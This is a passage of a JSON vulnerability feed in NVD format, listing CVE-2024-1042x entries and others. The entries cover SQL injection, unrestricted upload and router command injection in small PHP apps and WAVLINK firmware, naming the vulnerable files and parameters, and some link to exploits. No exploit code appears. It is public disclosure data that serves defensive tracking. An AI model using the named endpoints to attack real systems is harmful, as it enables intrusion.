Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281961", "name" : "VDB-281961 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431949", "name" : "Submit #431949 | SourceCodester Attendance and Payroll System v1.0 Unrestricted Upload", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/K1nako0/tmp_vuln12/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln12/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in SourceCodester Attendance and Payroll System 1.0. This affects the function upload of the file /marimar/guest/update.php. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nurhodelta17:attendance_and_payroll_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T16:15Z", "lastModifiedDate" : "2024-10-29T00:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10421", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281962", "name" : "VDB-281962 | SourceCodester Attendance and Payroll System overtime_row.php sql injection", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281962", "name" : "VDB-281962 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431979", "name" : "Submit #431979 | SourceCodester Attendance and Payroll System v1.0 \\admin\\overtime_row.php SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/K1nako0/tmp_vuln13/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln13/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in SourceCodester Attendance and Payroll System 1.0. This vulnerability affects unknown code of the file /admin/overtime_row.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nurhodelta17:attendance_and_payroll_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T17:15Z", "lastModifiedDate" : "2024-10-29T00:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10422", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281963", "name" : "VDB-281963 | SourceCodester Attendance and Payroll System overtime_add.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281963", "name" : "VDB-281963 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431980", "name" : "Submit #431980 | SourceCodester Attendance and Payroll System v1.0 \\admin\\overtime_add.php SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/K1nako0/tmp_vuln14/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln14/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in SourceCodester Attendance and Payroll System 1.0. This issue affects some unknown processing of the file /admin/overtime_add.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nurhodelta17:attendance_and_payroll_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T18:15Z", "lastModifiedDate" : "2024-10-29T00:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10423", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_student_project_allocation_system_add_project_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_student_project_allocation_system_add_project_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281964", "name" : "VDB-281964 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281964", "name" : "VDB-281964 | Project Worlds Student Project Allocation System Project Selection Page project_selection.php sql injection", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.431981", "name" : "Submit #431981 | Project Worlds Student Project Allocation System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Project Worlds Student Project Allocation System 1.0. Affected is an unknown function of the file /student/project_selection/project_selection.php of the component Project Selection Page. The manipulation of the argument project_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:student_project_allocation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T18:15Z", "lastModifiedDate" : "2024-10-29T13:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10424", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_student_project_allocation_system_remove_project_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_student_project_allocation_system_remove_project_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281965", "name" : "VDB-281965 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281965", "name" : "VDB-281965 | Project Worlds Student Project Allocation System Project Selection Page remove_project.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431983", "name" : "Submit #431983 | Project Worlds Student Project Allocation System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Project Worlds Student Project Allocation System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /student/project_selection/remove_project.php of the component Project Selection Page. The manipulation of the argument no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:student_project_allocation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T19:15Z", "lastModifiedDate" : "2024-10-29T13:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10425", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_student_project_allocation_system_move_up_project_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_student_project_allocation_system_move_up_project_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281966", "name" : "VDB-281966 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281966", "name" : "VDB-281966 | Project Worlds Student Project Allocation System Project Selection Page move_up_project.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431984", "name" : "Submit #431984 | Project Worlds Student Project Allocation System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Project Worlds Student Project Allocation System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /student/project_selection/move_up_project.php of the component Project Selection Page. The manipulation of the argument up leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:student_project_allocation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T19:15Z", "lastModifiedDate" : "2024-10-29T13:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10426", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/21", "name" : "https://github.com/ppp-src/CVE/issues/21", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281967", "name" : "VDB-281967 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281967", "name" : "VDB-281967 | Codezips Pet Shop Management System animalsadd.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.432132", "name" : "Submit #432132 | Codezips Pet Shop Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Codezips Pet Shop Management System 1.0. It has been classified as critical. This affects an unknown part of the file /animalsadd.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions the parameter \"refno\" to be affected. But further inspection indicates that the name of the affected parameter is \"id\"." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:pet_shop_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T20:15Z", "lastModifiedDate" : "2024-10-30T18:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10427", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/22", "name" : "https://github.com/ppp-src/CVE/issues/22", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.281968", "name" : "VDB-281968 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281968", "name" : "VDB-281968 | Codezips Pet Shop Management System deleteanimal.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.432134", "name" : "Submit #432134 | Codezips Pet Shop Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Codezips Pet Shop Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /deleteanimal.php. The manipulation of the argument t1 leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions the parameter \"refno\" to be affected. But further inspection indicates that the name of the affected parameter is \"t1\"." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:pet_shop_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T20:15Z", "lastModifiedDate" : "2024-10-30T18:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10428", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.google.com/document/d/11NGSJBOZzbgm_qanDno6SyucWyso7Em6/", "name" : "https://docs.google.com/document/d/11NGSJBOZzbgm_qanDno6SyucWyso7Em6/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281969", "name" : "VDB-281969 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281969", "name" : "VDB-281969 | WAVLINK WN530H4/WN530HG4/WN572HG3 firewall.cgi set_ipv6 command injection", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427272", "name" : "Submit #427272 | wavlink WN530H4,WN530HG4,WN572HG3 WN530H4-WAVLINK_20220721,WN530HG4-WAVLINK_20220809,WN572HG3-WAVLINK_WO_20221028 Command Injection", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in WAVLINK WN530H4, WN530HG4 and WN572HG3 up to 20221028. It has been rated as critical. This issue affects the function set_ipv6 of the file firewall.cgi. The manipulation of the argument dhcpGateway leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn530h4_firmware:20220721:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn530h4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn530hg4_firmware:20220809:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn530hg4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn572hg3_firmware:20221028:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn572hg3:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T21:15Z", "lastModifiedDate" : "2024-11-13T17:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10429", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.google.com/document/d/1ktuys5jr7MKwz503QBbEfxZ5mZbXlbvl/", "name" : "https://docs.google.com/document/d/1ktuys5jr7MKwz503QBbEfxZ5mZbXlbvl/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281970", "name" : "VDB-281970 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281970", "name" : "VDB-281970 | WAVLINK WN530H4/WN530HG4/WN572HG3 internet.cgi set_ipv6 command injection", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427274", "name" : "Submit #427274 | wavlink WN530H4,WN530HG4,WN572HG3 WN530H4-WAVLINK_20220721,WN530HG4-WAVLINK_20220809,WN572HG3-WAVLINK_WO_20221028 Command Injection", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in WAVLINK WN530H4, WN530HG4 and WN572HG3 up to 20221028. Affected is the function set_ipv6 of the file internet.cgi. The manipulation of the argument IPv6OpMode/IPv6IPAddr/IPv6WANIPAddr/IPv6GWAddr leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn530h4_firmware:20220721:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn530h4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn530hg4_firmware:20220809:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn530hg4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn572hg3_firmware:20221028:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn572hg3:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T21:15Z", "lastModifiedDate" : "2024-11-13T17:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1043", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93.1/pagebuilder/inc/adminAjaxContents.php#L134", "name" : "https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93.1/pagebuilder/inc/adminAjaxContents.php#L134", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3030425/accelerated-mobile-pages/tags/1.0.93.2/pagebuilder/inc/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php", "name" : "https://plugins.trac.wordpress.org/changeset/3030425/accelerated-mobile-pages/tags/1.0.93.2/pagebuilder/inc/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://wordpress.org/plugins/accelerated-mobile-pages/", "name" : "https://wordpress.org/plugins/accelerated-mobile-pages/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93.1/pagebuilder/inc/adminAjaxContents.php#L134", "name" : "https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93.1/pagebuilder/inc/adminAjaxContents.php#L134", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/accelerated-mobile-pages/", "name" : "https://wordpress.org/plugins/accelerated-mobile-pages/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3030425/accelerated-mobile-pages/tags/1.0.93.2/pagebuilder/inc/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php", "name" : 